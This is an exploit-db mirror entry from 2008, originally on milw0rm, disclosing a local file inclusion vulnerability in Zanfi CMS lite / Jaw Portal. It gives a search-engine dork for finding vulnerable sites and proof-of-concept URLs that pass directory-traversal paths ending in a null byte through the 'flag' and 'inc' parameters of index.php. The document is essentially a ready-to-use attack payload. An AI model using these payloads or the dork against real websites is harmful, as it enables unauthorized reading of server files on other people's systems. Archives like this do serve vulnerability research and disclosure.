exploit-db-mirror/exploits/php/webapps/6413.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

31 lines
No EOL
897 B
Text

############################################################################################################
[+]Zanfi CMS lite / Jaw Portal free (index.php page) Multiple Local File Inclusion
[+]Discovered by SirGod
[+]MorTal TeaM
[+]Greetz E.M.I.N.EM,Ras,Puscas_marin,ToxicBlood,HrN,Kemrayz,007m
############################################################################################################
[+] Dork : Powered by: Zanfi Solutions
[+] Local File Inclusion
PoC :
http://[target]/[Path]index.php?flag=[Local File]%00
Example :
http://127.0.0.1/index.php?flag=../../../autoexec.bat%00
PoC :
http://[target]/[Path]/index.php?inc=[Local File]%00
Example :
http://127.0.0.1/index.php?inc=../../../autoexec.bat%00
############################################################################################################
# milw0rm.com [2008-09-10]